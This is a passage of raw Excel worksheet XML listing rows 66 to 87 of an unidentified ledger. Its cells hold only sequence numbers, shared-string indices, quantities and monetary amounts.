      <c r="B66" s="23">
        <v>150</v>
      </c>
      <c r="C66" s="257" t="s">
        <v>4284</v>
      </c>
      <c r="D66" s="258" t="s">
        <v>4280</v>
      </c>
      <c r="E66" s="66"/>
      <c r="F66" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G66" s="36">
        <v>1</v>
      </c>
      <c r="H66" s="257" t="s">
        <v>596</v>
      </c>
      <c r="I66" s="67">
        <v>51000</v>
      </c>
      <c r="J66" s="50">
        <v>13872</v>
      </c>
      <c r="K66" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L66" s="47"/>
      <c r="M66" s="47"/>
      <c r="N66" s="47"/>
      <c r="O66" s="47"/>
      <c r="P66" s="47"/>
      <c r="Q66" s="47"/>
      <c r="R66" s="47"/>
      <c r="S66" s="47"/>
      <c r="T66" s="47"/>
      <c r="U66" s="47"/>
      <c r="V66" s="47"/>
      <c r="W66" s="47"/>
      <c r="X66" s="47"/>
      <c r="Y66" s="47"/>
      <c r="Z66" s="47"/>
      <c r="AA66" s="47"/>
      <c r="AB66" s="47"/>
      <c r="AC66" s="47"/>
      <c r="AD66" s="47"/>
      <c r="AE66" s="47"/>
      <c r="AF66" s="47"/>
      <c r="AG66" s="47"/>
    </row>
    <row r="67" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A67" s="25"/>
      <c r="B67" s="23">
        <v>151</v>
      </c>
      <c r="C67" s="257" t="s">
        <v>4285</v>
      </c>
      <c r="D67" s="258" t="s">
        <v>331</v>
      </c>
      <c r="E67" s="66"/>
      <c r="F67" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G67" s="36">
        <v>2</v>
      </c>
      <c r="H67" s="257" t="s">
        <v>600</v>
      </c>
      <c r="I67" s="67">
        <v>24000</v>
      </c>
      <c r="J67" s="50">
        <v>7680</v>
      </c>
      <c r="K67" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L67" s="47"/>
      <c r="M67" s="47"/>
      <c r="N67" s="47"/>
      <c r="O67" s="47"/>
      <c r="P67" s="47"/>
      <c r="Q67" s="47"/>
      <c r="R67" s="47"/>
      <c r="S67" s="47"/>
      <c r="T67" s="47"/>
      <c r="U67" s="47"/>
      <c r="V67" s="47"/>
      <c r="W67" s="47"/>
      <c r="X67" s="47"/>
      <c r="Y67" s="47"/>
      <c r="Z67" s="47"/>
      <c r="AA67" s="47"/>
      <c r="AB67" s="47"/>
      <c r="AC67" s="47"/>
      <c r="AD67" s="47"/>
      <c r="AE67" s="47"/>
      <c r="AF67" s="47"/>
      <c r="AG67" s="47"/>
    </row>
    <row r="68" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A68" s="25"/>
      <c r="B68" s="23">
        <v>152</v>
      </c>
      <c r="C68" s="257" t="s">
        <v>4286</v>
      </c>
      <c r="D68" s="258" t="s">
        <v>315</v>
      </c>
      <c r="E68" s="66"/>
      <c r="F68" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G68" s="36">
        <v>4</v>
      </c>
      <c r="H68" s="257" t="s">
        <v>634</v>
      </c>
      <c r="I68" s="67">
        <v>86000</v>
      </c>
      <c r="J68" s="50">
        <v>11008</v>
      </c>
      <c r="K68" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L68" s="47"/>
      <c r="M68" s="47"/>
      <c r="N68" s="47"/>
      <c r="O68" s="47"/>
      <c r="P68" s="47"/>
      <c r="Q68" s="47"/>
      <c r="R68" s="47"/>
      <c r="S68" s="47"/>
      <c r="T68" s="47"/>
      <c r="U68" s="47"/>
      <c r="V68" s="47"/>
      <c r="W68" s="47"/>
      <c r="X68" s="47"/>
      <c r="Y68" s="47"/>
      <c r="Z68" s="47"/>
      <c r="AA68" s="47"/>
      <c r="AB68" s="47"/>
      <c r="AC68" s="47"/>
      <c r="AD68" s="47"/>
      <c r="AE68" s="47"/>
      <c r="AF68" s="47"/>
      <c r="AG68" s="47"/>
    </row>
    <row r="69" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A69" s="25"/>
      <c r="B69" s="23">
        <v>153</v>
      </c>
      <c r="C69" s="257" t="s">
        <v>4287</v>
      </c>
      <c r="D69" s="258" t="s">
        <v>4288</v>
      </c>
      <c r="E69" s="66"/>
      <c r="F69" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G69" s="36">
        <v>1</v>
      </c>
      <c r="H69" s="257" t="s">
        <v>3316</v>
      </c>
      <c r="I69" s="67">
        <v>570000</v>
      </c>
      <c r="J69" s="50">
        <v>156800</v>
      </c>
      <c r="K69" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L69" s="47"/>
      <c r="M69" s="47"/>
      <c r="N69" s="47"/>
      <c r="O69" s="47"/>
      <c r="P69" s="47"/>
      <c r="Q69" s="47"/>
      <c r="R69" s="47"/>
      <c r="S69" s="47"/>
      <c r="T69" s="47"/>
      <c r="U69" s="47"/>
      <c r="V69" s="47"/>
      <c r="W69" s="47"/>
      <c r="X69" s="47"/>
      <c r="Y69" s="47"/>
      <c r="Z69" s="47"/>
      <c r="AA69" s="47"/>
      <c r="AB69" s="47"/>
      <c r="AC69" s="47"/>
      <c r="AD69" s="47"/>
      <c r="AE69" s="47"/>
      <c r="AF69" s="47"/>
      <c r="AG69" s="47"/>
    </row>
    <row r="70" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A70" s="25"/>
      <c r="B70" s="23">
        <v>154</v>
      </c>
      <c r="C70" s="257" t="s">
        <v>4289</v>
      </c>
      <c r="D70" s="258" t="s">
        <v>4249</v>
      </c>
      <c r="E70" s="66"/>
      <c r="F70" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G70" s="36">
        <v>1</v>
      </c>
      <c r="H70" s="257" t="s">
        <v>2000</v>
      </c>
      <c r="I70" s="67">
        <v>30400</v>
      </c>
      <c r="J70" s="50">
        <v>8000</v>
      </c>
      <c r="K70" s="259" t="s">
        <v>4290</v>
      </c>
      <c r="L70" s="47"/>
      <c r="M70" s="47"/>
      <c r="N70" s="47"/>
      <c r="O70" s="47"/>
      <c r="P70" s="47"/>
      <c r="Q70" s="47"/>
      <c r="R70" s="47"/>
      <c r="S70" s="47"/>
      <c r="T70" s="47"/>
      <c r="U70" s="47"/>
      <c r="V70" s="47"/>
      <c r="W70" s="47"/>
      <c r="X70" s="47"/>
      <c r="Y70" s="47"/>
      <c r="Z70" s="47"/>
      <c r="AA70" s="47"/>
      <c r="AB70" s="47"/>
      <c r="AC70" s="47"/>
      <c r="AD70" s="47"/>
      <c r="AE70" s="47"/>
      <c r="AF70" s="47"/>
      <c r="AG70" s="47"/>
    </row>
    <row r="71" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A71" s="25"/>
      <c r="B71" s="23">
        <v>155</v>
      </c>
      <c r="C71" s="257" t="s">
        <v>4291</v>
      </c>
      <c r="D71" s="258" t="s">
        <v>4292</v>
      </c>
      <c r="E71" s="66"/>
      <c r="F71" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G71" s="36">
        <v>1</v>
      </c>
      <c r="H71" s="257" t="s">
        <v>1892</v>
      </c>
      <c r="I71" s="67">
        <v>2600</v>
      </c>
      <c r="J71" s="50">
        <v>332.8</v>
      </c>
      <c r="K71" s="259" t="s">
        <v>1799</v>
      </c>
      <c r="L71" s="47"/>
      <c r="M71" s="47"/>
      <c r="N71" s="47"/>
      <c r="O71" s="47"/>
      <c r="P71" s="47"/>
      <c r="Q71" s="47"/>
      <c r="R71" s="47"/>
      <c r="S71" s="47"/>
      <c r="T71" s="47"/>
      <c r="U71" s="47"/>
      <c r="V71" s="47"/>
      <c r="W71" s="47"/>
      <c r="X71" s="47"/>
      <c r="Y71" s="47"/>
      <c r="Z71" s="47"/>
      <c r="AA71" s="47"/>
      <c r="AB71" s="47"/>
      <c r="AC71" s="47"/>
      <c r="AD71" s="47"/>
      <c r="AE71" s="47"/>
      <c r="AF71" s="47"/>
      <c r="AG71" s="47"/>
    </row>
    <row r="72" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A72" s="25"/>
      <c r="B72" s="23">
        <v>156</v>
      </c>
      <c r="C72" s="257" t="s">
        <v>4293</v>
      </c>
      <c r="D72" s="258" t="s">
        <v>4294</v>
      </c>
      <c r="E72" s="66"/>
      <c r="F72" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G72" s="36">
        <v>1</v>
      </c>
      <c r="H72" s="257" t="s">
        <v>1892</v>
      </c>
      <c r="I72" s="67">
        <v>2650</v>
      </c>
      <c r="J72" s="50">
        <v>339.2</v>
      </c>
      <c r="K72" s="68"/>
      <c r="L72" s="47"/>
      <c r="M72" s="47"/>
      <c r="N72" s="47"/>
      <c r="O72" s="47"/>
      <c r="P72" s="47"/>
      <c r="Q72" s="47"/>
      <c r="R72" s="47"/>
      <c r="S72" s="47"/>
      <c r="T72" s="47"/>
      <c r="U72" s="47"/>
      <c r="V72" s="47"/>
      <c r="W72" s="47"/>
      <c r="X72" s="47"/>
      <c r="Y72" s="47"/>
      <c r="Z72" s="47"/>
      <c r="AA72" s="47"/>
      <c r="AB72" s="47"/>
      <c r="AC72" s="47"/>
      <c r="AD72" s="47"/>
      <c r="AE72" s="47"/>
      <c r="AF72" s="47"/>
      <c r="AG72" s="47"/>
    </row>
    <row r="73" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A73" s="25"/>
      <c r="B73" s="23">
        <v>158</v>
      </c>
      <c r="C73" s="257" t="s">
        <v>4295</v>
      </c>
      <c r="D73" s="258" t="s">
        <v>3233</v>
      </c>
      <c r="E73" s="66"/>
      <c r="F73" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G73" s="36">
        <v>2</v>
      </c>
      <c r="H73" s="257" t="s">
        <v>3363</v>
      </c>
      <c r="I73" s="67">
        <v>138000</v>
      </c>
      <c r="J73" s="50">
        <v>17664</v>
      </c>
      <c r="K73" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L73" s="25"/>
      <c r="M73" s="25"/>
      <c r="N73" s="47"/>
      <c r="O73" s="47"/>
      <c r="P73" s="47"/>
      <c r="Q73" s="47"/>
      <c r="R73" s="47"/>
      <c r="S73" s="47"/>
      <c r="T73" s="47"/>
      <c r="U73" s="47"/>
      <c r="V73" s="47"/>
      <c r="W73" s="47"/>
      <c r="X73" s="47"/>
      <c r="Y73" s="47"/>
      <c r="Z73" s="47"/>
      <c r="AA73" s="47"/>
      <c r="AB73" s="47"/>
      <c r="AC73" s="47"/>
      <c r="AD73" s="47"/>
      <c r="AE73" s="47"/>
      <c r="AF73" s="47"/>
      <c r="AG73" s="47"/>
    </row>
    <row r="74" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A74" s="25"/>
      <c r="B74" s="23">
        <v>161</v>
      </c>
      <c r="C74" s="257" t="s">
        <v>4296</v>
      </c>
      <c r="D74" s="258" t="s">
        <v>1092</v>
      </c>
      <c r="E74" s="258" t="s">
        <v>4297</v>
      </c>
      <c r="F74" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G74" s="36">
        <v>1</v>
      </c>
      <c r="H74" s="257" t="s">
        <v>1465</v>
      </c>
      <c r="I74" s="67">
        <v>5900</v>
      </c>
      <c r="J74" s="50">
        <v>755.2</v>
      </c>
      <c r="K74" s="259" t="s">
        <v>4191</v>
      </c>
      <c r="L74" s="25"/>
      <c r="M74" s="25"/>
      <c r="N74" s="47"/>
      <c r="O74" s="47"/>
      <c r="P74" s="47"/>
      <c r="Q74" s="47"/>
      <c r="R74" s="47"/>
      <c r="S74" s="47"/>
      <c r="T74" s="47"/>
      <c r="U74" s="47"/>
      <c r="V74" s="47"/>
      <c r="W74" s="47"/>
      <c r="X74" s="47"/>
      <c r="Y74" s="47"/>
      <c r="Z74" s="47"/>
      <c r="AA74" s="47"/>
      <c r="AB74" s="47"/>
      <c r="AC74" s="47"/>
      <c r="AD74" s="47"/>
      <c r="AE74" s="47"/>
      <c r="AF74" s="47"/>
      <c r="AG74" s="47"/>
    </row>
    <row r="75" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A75" s="25"/>
      <c r="B75" s="23">
        <v>163</v>
      </c>
      <c r="C75" s="257" t="s">
        <v>4298</v>
      </c>
      <c r="D75" s="258" t="s">
        <v>4299</v>
      </c>
      <c r="E75" s="66"/>
      <c r="F75" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G75" s="36">
        <v>1</v>
      </c>
      <c r="H75" s="257" t="s">
        <v>1544</v>
      </c>
      <c r="I75" s="67">
        <v>304227.64</v>
      </c>
      <c r="J75" s="50">
        <v>38400</v>
      </c>
      <c r="K75" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L75" s="25"/>
      <c r="M75" s="25"/>
      <c r="N75" s="47"/>
      <c r="O75" s="47"/>
      <c r="P75" s="47"/>
      <c r="Q75" s="47"/>
      <c r="R75" s="47"/>
      <c r="S75" s="47"/>
      <c r="T75" s="47"/>
      <c r="U75" s="47"/>
      <c r="V75" s="47"/>
      <c r="W75" s="47"/>
      <c r="X75" s="47"/>
      <c r="Y75" s="47"/>
      <c r="Z75" s="47"/>
      <c r="AA75" s="47"/>
      <c r="AB75" s="47"/>
      <c r="AC75" s="47"/>
      <c r="AD75" s="47"/>
      <c r="AE75" s="47"/>
      <c r="AF75" s="47"/>
      <c r="AG75" s="47"/>
    </row>
    <row r="76" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A76" s="25"/>
      <c r="B76" s="23">
        <v>164</v>
      </c>
      <c r="C76" s="257" t="s">
        <v>4300</v>
      </c>
      <c r="D76" s="258" t="s">
        <v>4301</v>
      </c>
      <c r="E76" s="258" t="s">
        <v>4302</v>
      </c>
      <c r="F76" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G76" s="36">
        <v>1</v>
      </c>
      <c r="H76" s="257" t="s">
        <v>612</v>
      </c>
      <c r="I76" s="67">
        <v>1317895.56</v>
      </c>
      <c r="J76" s="50">
        <v>64000</v>
      </c>
      <c r="K76" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L76" s="47"/>
      <c r="M76" s="47"/>
      <c r="N76" s="47"/>
      <c r="O76" s="47"/>
      <c r="P76" s="47"/>
      <c r="Q76" s="47"/>
      <c r="R76" s="47"/>
      <c r="S76" s="47"/>
      <c r="T76" s="47"/>
      <c r="U76" s="47"/>
      <c r="V76" s="47"/>
      <c r="W76" s="47"/>
      <c r="X76" s="47"/>
      <c r="Y76" s="47"/>
      <c r="Z76" s="47"/>
      <c r="AA76" s="47"/>
      <c r="AB76" s="47"/>
      <c r="AC76" s="47"/>
      <c r="AD76" s="47"/>
      <c r="AE76" s="47"/>
      <c r="AF76" s="47"/>
      <c r="AG76" s="47"/>
    </row>
    <row r="77" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A77" s="25"/>
      <c r="B77" s="23">
        <v>165</v>
      </c>
      <c r="C77" s="257" t="s">
        <v>4303</v>
      </c>
      <c r="D77" s="258" t="s">
        <v>4304</v>
      </c>
      <c r="E77" s="66"/>
      <c r="F77" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G77" s="36">
        <v>1</v>
      </c>
      <c r="H77" s="257" t="s">
        <v>612</v>
      </c>
      <c r="I77" s="67">
        <v>458299.15</v>
      </c>
      <c r="J77" s="50">
        <v>96000</v>
      </c>
      <c r="K77" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L77" s="47"/>
      <c r="M77" s="47"/>
      <c r="N77" s="47"/>
      <c r="O77" s="47"/>
      <c r="P77" s="47"/>
      <c r="Q77" s="47"/>
      <c r="R77" s="47"/>
      <c r="S77" s="47"/>
      <c r="T77" s="47"/>
      <c r="U77" s="47"/>
      <c r="V77" s="47"/>
      <c r="W77" s="47"/>
      <c r="X77" s="47"/>
      <c r="Y77" s="47"/>
      <c r="Z77" s="47"/>
      <c r="AA77" s="47"/>
      <c r="AB77" s="47"/>
      <c r="AC77" s="47"/>
      <c r="AD77" s="47"/>
      <c r="AE77" s="47"/>
      <c r="AF77" s="47"/>
      <c r="AG77" s="47"/>
    </row>
    <row r="78" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A78" s="25"/>
      <c r="B78" s="23">
        <v>167</v>
      </c>
      <c r="C78" s="257" t="s">
        <v>4305</v>
      </c>
      <c r="D78" s="258" t="s">
        <v>4306</v>
      </c>
      <c r="E78" s="258" t="s">
        <v>4307</v>
      </c>
      <c r="F78" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G78" s="36">
        <v>1</v>
      </c>
      <c r="H78" s="257" t="s">
        <v>4308</v>
      </c>
      <c r="I78" s="67">
        <v>17094.02</v>
      </c>
      <c r="J78" s="50">
        <v>6120</v>
      </c>
      <c r="K78" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L78" s="47"/>
      <c r="M78" s="47"/>
      <c r="N78" s="47"/>
      <c r="O78" s="47"/>
      <c r="P78" s="47"/>
      <c r="Q78" s="47"/>
      <c r="R78" s="47"/>
      <c r="S78" s="47"/>
      <c r="T78" s="47"/>
      <c r="U78" s="47"/>
      <c r="V78" s="47"/>
      <c r="W78" s="47"/>
      <c r="X78" s="47"/>
      <c r="Y78" s="47"/>
      <c r="Z78" s="47"/>
      <c r="AA78" s="47"/>
      <c r="AB78" s="47"/>
      <c r="AC78" s="47"/>
      <c r="AD78" s="47"/>
      <c r="AE78" s="47"/>
      <c r="AF78" s="47"/>
      <c r="AG78" s="47"/>
    </row>
    <row r="79" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A79" s="25"/>
      <c r="B79" s="23">
        <v>168</v>
      </c>
      <c r="C79" s="257" t="s">
        <v>4309</v>
      </c>
      <c r="D79" s="258" t="s">
        <v>2440</v>
      </c>
      <c r="E79" s="258" t="s">
        <v>4310</v>
      </c>
      <c r="F79" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G79" s="36">
        <v>1</v>
      </c>
      <c r="H79" s="257" t="s">
        <v>4311</v>
      </c>
      <c r="I79" s="67">
        <v>2580.34</v>
      </c>
      <c r="J79" s="50">
        <v>672</v>
      </c>
      <c r="K79" s="259" t="s">
        <v>4164</v>
      </c>
      <c r="L79" s="47"/>
      <c r="M79" s="47"/>
      <c r="N79" s="47"/>
      <c r="O79" s="47"/>
      <c r="P79" s="47"/>
      <c r="Q79" s="47"/>
      <c r="R79" s="47"/>
      <c r="S79" s="47"/>
      <c r="T79" s="47"/>
      <c r="U79" s="47"/>
      <c r="V79" s="47"/>
      <c r="W79" s="47"/>
      <c r="X79" s="47"/>
      <c r="Y79" s="47"/>
      <c r="Z79" s="47"/>
      <c r="AA79" s="47"/>
      <c r="AB79" s="47"/>
      <c r="AC79" s="47"/>
      <c r="AD79" s="47"/>
      <c r="AE79" s="47"/>
      <c r="AF79" s="47"/>
      <c r="AG79" s="47"/>
    </row>
    <row r="80" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A80" s="25"/>
      <c r="B80" s="23">
        <v>169</v>
      </c>
      <c r="C80" s="257" t="s">
        <v>4312</v>
      </c>
      <c r="D80" s="258" t="s">
        <v>4313</v>
      </c>
      <c r="E80" s="258" t="s">
        <v>4314</v>
      </c>
      <c r="F80" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G80" s="36">
        <v>1</v>
      </c>
      <c r="H80" s="257" t="s">
        <v>1182</v>
      </c>
      <c r="I80" s="67">
        <v>9572.65</v>
      </c>
      <c r="J80" s="50">
        <v>3800</v>
      </c>
      <c r="K80" s="259" t="s">
        <v>4251</v>
      </c>
      <c r="L80" s="47"/>
      <c r="M80" s="47"/>
      <c r="N80" s="47"/>
      <c r="O80" s="47"/>
      <c r="P80" s="47"/>
      <c r="Q80" s="47"/>
      <c r="R80" s="47"/>
      <c r="S80" s="47"/>
      <c r="T80" s="47"/>
      <c r="U80" s="47"/>
      <c r="V80" s="47"/>
      <c r="W80" s="47"/>
      <c r="X80" s="47"/>
      <c r="Y80" s="47"/>
      <c r="Z80" s="47"/>
      <c r="AA80" s="47"/>
      <c r="AB80" s="47"/>
      <c r="AC80" s="47"/>
      <c r="AD80" s="47"/>
      <c r="AE80" s="47"/>
      <c r="AF80" s="47"/>
      <c r="AG80" s="47"/>
    </row>
    <row r="81" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A81" s="25"/>
      <c r="B81" s="23">
        <v>170</v>
      </c>
      <c r="C81" s="257" t="s">
        <v>4315</v>
      </c>
      <c r="D81" s="258" t="s">
        <v>4313</v>
      </c>
      <c r="E81" s="66"/>
      <c r="F81" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G81" s="36">
        <v>2</v>
      </c>
      <c r="H81" s="257" t="s">
        <v>1182</v>
      </c>
      <c r="I81" s="67">
        <v>27008.55</v>
      </c>
      <c r="J81" s="50">
        <v>10800</v>
      </c>
      <c r="K81" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L81" s="47"/>
      <c r="M81" s="47"/>
      <c r="N81" s="47"/>
      <c r="O81" s="47"/>
      <c r="P81" s="47"/>
      <c r="Q81" s="47"/>
      <c r="R81" s="47"/>
      <c r="S81" s="47"/>
      <c r="T81" s="47"/>
      <c r="U81" s="47"/>
      <c r="V81" s="47"/>
      <c r="W81" s="47"/>
      <c r="X81" s="47"/>
      <c r="Y81" s="47"/>
      <c r="Z81" s="47"/>
      <c r="AA81" s="47"/>
      <c r="AB81" s="47"/>
      <c r="AC81" s="47"/>
      <c r="AD81" s="47"/>
      <c r="AE81" s="47"/>
      <c r="AF81" s="47"/>
      <c r="AG81" s="47"/>
    </row>
    <row r="82" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A82" s="25"/>
      <c r="B82" s="23">
        <v>171</v>
      </c>
      <c r="C82" s="257" t="s">
        <v>4316</v>
      </c>
      <c r="D82" s="258" t="s">
        <v>4317</v>
      </c>
      <c r="E82" s="66"/>
      <c r="F82" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G82" s="36">
        <v>1</v>
      </c>
      <c r="H82" s="257" t="s">
        <v>3397</v>
      </c>
      <c r="I82" s="67">
        <v>105000</v>
      </c>
      <c r="J82" s="50">
        <v>4200</v>
      </c>
      <c r="K82" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L82" s="47"/>
      <c r="M82" s="47"/>
      <c r="N82" s="47"/>
      <c r="O82" s="47"/>
      <c r="P82" s="47"/>
      <c r="Q82" s="47"/>
      <c r="R82" s="47"/>
      <c r="S82" s="47"/>
      <c r="T82" s="47"/>
      <c r="U82" s="47"/>
      <c r="V82" s="47"/>
      <c r="W82" s="47"/>
      <c r="X82" s="47"/>
      <c r="Y82" s="47"/>
      <c r="Z82" s="47"/>
      <c r="AA82" s="47"/>
      <c r="AB82" s="47"/>
      <c r="AC82" s="47"/>
      <c r="AD82" s="47"/>
      <c r="AE82" s="47"/>
      <c r="AF82" s="47"/>
      <c r="AG82" s="47"/>
    </row>
    <row r="83" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A83" s="25"/>
      <c r="B83" s="23">
        <v>172</v>
      </c>
      <c r="C83" s="257" t="s">
        <v>4318</v>
      </c>
      <c r="D83" s="258" t="s">
        <v>4319</v>
      </c>
      <c r="E83" s="258" t="s">
        <v>4320</v>
      </c>
      <c r="F83" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G83" s="36">
        <v>1</v>
      </c>
      <c r="H83" s="257" t="s">
        <v>3397</v>
      </c>
      <c r="I83" s="67">
        <v>39743.59</v>
      </c>
      <c r="J83" s="50">
        <v>24000</v>
      </c>
      <c r="K83" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L83" s="47"/>
      <c r="M83" s="47"/>
      <c r="N83" s="47"/>
      <c r="O83" s="47"/>
      <c r="P83" s="47"/>
      <c r="Q83" s="47"/>
      <c r="R83" s="47"/>
      <c r="S83" s="47"/>
      <c r="T83" s="47"/>
      <c r="U83" s="47"/>
      <c r="V83" s="47"/>
      <c r="W83" s="47"/>
      <c r="X83" s="47"/>
      <c r="Y83" s="47"/>
      <c r="Z83" s="47"/>
      <c r="AA83" s="47"/>
      <c r="AB83" s="47"/>
      <c r="AC83" s="47"/>
      <c r="AD83" s="47"/>
      <c r="AE83" s="47"/>
      <c r="AF83" s="47"/>
      <c r="AG83" s="47"/>
    </row>
    <row r="84" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A84" s="25"/>
      <c r="B84" s="23">
        <v>173</v>
      </c>
      <c r="C84" s="257" t="s">
        <v>4321</v>
      </c>
      <c r="D84" s="258" t="s">
        <v>4322</v>
      </c>
      <c r="E84" s="66"/>
      <c r="F84" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G84" s="36">
        <v>2</v>
      </c>
      <c r="H84" s="257" t="s">
        <v>995</v>
      </c>
      <c r="I84" s="67">
        <v>290598.29</v>
      </c>
      <c r="J84" s="50">
        <v>120000</v>
      </c>
      <c r="K84" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L84" s="25"/>
      <c r="M84" s="25"/>
      <c r="N84" s="47"/>
      <c r="O84" s="47"/>
      <c r="P84" s="47"/>
      <c r="Q84" s="47"/>
      <c r="R84" s="47"/>
      <c r="S84" s="47"/>
      <c r="T84" s="47"/>
      <c r="U84" s="47"/>
      <c r="V84" s="47"/>
      <c r="W84" s="47"/>
      <c r="X84" s="47"/>
      <c r="Y84" s="47"/>
      <c r="Z84" s="47"/>
      <c r="AA84" s="47"/>
      <c r="AB84" s="47"/>
      <c r="AC84" s="47"/>
      <c r="AD84" s="47"/>
      <c r="AE84" s="47"/>
      <c r="AF84" s="47"/>
      <c r="AG84" s="47"/>
    </row>
    <row r="85" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A85" s="25"/>
      <c r="B85" s="23">
        <v>174</v>
      </c>
      <c r="C85" s="257" t="s">
        <v>4323</v>
      </c>
      <c r="D85" s="258" t="s">
        <v>4324</v>
      </c>
      <c r="E85" s="66"/>
      <c r="F85" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G85" s="36">
        <v>1</v>
      </c>
      <c r="H85" s="257" t="s">
        <v>3441</v>
      </c>
      <c r="I85" s="67">
        <v>9807359.38</v>
      </c>
      <c r="J85" s="50">
        <v>784000</v>
      </c>
      <c r="K85" s="259" t="s">
        <v>1784</v>
      </c>
      <c r="L85" s="25"/>
      <c r="M85" s="25"/>
      <c r="N85" s="47"/>
      <c r="O85" s="47"/>
      <c r="P85" s="47"/>
      <c r="Q85" s="47"/>
      <c r="R85" s="47"/>
      <c r="S85" s="47"/>
      <c r="T85" s="47"/>
      <c r="U85" s="47"/>
      <c r="V85" s="47"/>
      <c r="W85" s="47"/>
      <c r="X85" s="47"/>
      <c r="Y85" s="47"/>
      <c r="Z85" s="47"/>
      <c r="AA85" s="47"/>
      <c r="AB85" s="47"/>
      <c r="AC85" s="47"/>
      <c r="AD85" s="47"/>
      <c r="AE85" s="47"/>
      <c r="AF85" s="47"/>
      <c r="AG85" s="47"/>
    </row>
    <row r="86" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A86" s="25"/>
      <c r="B86" s="23">
        <v>175</v>
      </c>
      <c r="C86" s="257" t="s">
        <v>4325</v>
      </c>
      <c r="D86" s="258" t="s">
        <v>4326</v>
      </c>
      <c r="E86" s="258" t="s">
        <v>4327</v>
      </c>
      <c r="F86" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G86" s="36">
        <v>1</v>
      </c>
      <c r="H86" s="257" t="s">
        <v>3441</v>
      </c>
      <c r="I86" s="67">
        <v>61538.46</v>
      </c>
      <c r="J86" s="50">
        <v>24000</v>
      </c>
      <c r="K86" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L86" s="25"/>
      <c r="M86" s="25"/>
      <c r="N86" s="47"/>
      <c r="O86" s="47"/>
      <c r="P86" s="47"/>
      <c r="Q86" s="47"/>
      <c r="R86" s="47"/>
      <c r="S86" s="47"/>
      <c r="T86" s="47"/>
      <c r="U86" s="47"/>
      <c r="V86" s="47"/>
      <c r="W86" s="47"/>
      <c r="X86" s="47"/>
      <c r="Y86" s="47"/>
      <c r="Z86" s="47"/>
      <c r="AA86" s="47"/>
      <c r="AB86" s="47"/>
      <c r="AC86" s="47"/>
      <c r="AD86" s="47"/>
      <c r="AE86" s="47"/>
      <c r="AF86" s="47"/>
      <c r="AG86" s="47"/>
    </row>
    <row r="87" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A87" s="25"/>
      <c r="B87" s="23">
        <v>176</v>
      </c>
      <c r="C87" s="257" t="s">
        <v>4328</v>
      </c>
      <c r="D87" s="258" t="s">
        <v>4326</v>
      </c>
      <c r="E87" s="258" t="s">
        <v>1138</v>
      </c>
      <c r="F87" s="36" t="s">
        <v>466</v>
      </c>
      <c r="G87" s="36">
        <v>1</v>
      </c>
      <c r="H87" s="257" t="s">
        <v>432</v>
      </c>
      <c r="I87" s="67">
        <v>61538.46</v>
      </c>
      <c r="J87" s="50">
        <v>26000</v>
      </c>
      <c r="K87" s="259" t="s">
        <v>4167</v>
      </c>
      <c r="L87" s="71"/>
      <c r="M87" s="71"/>
      <c r="N87" s="47"/>
      <c r="O87" s="47"/>
      <c r="P87" s="47"/>
      <c r="Q87" s="47"/>
      <c r="R87" s="47"/>
      <c r="S87" s="47"/>
      <c r="T87" s="47"/>
      <c r="U87" s="47"/>
      <c r="V87" s="47"/>
      <c r="W87" s="47"/>
      <c r="X87" s="47"/>
      <c r="Y87" s="47"/>
      <c r="Z87" s="47"/>
      <c r="AA87" s="47"/>
      <c r="AB87" s="47"/>
      <c r="AC87" s="47"/>
      <c r="AD87" s="47"/>
      <c r="AE87" s="47"/>
      <c r="AF87" s="47"/>
      <c r="AG87" s="47"/>
    </row>
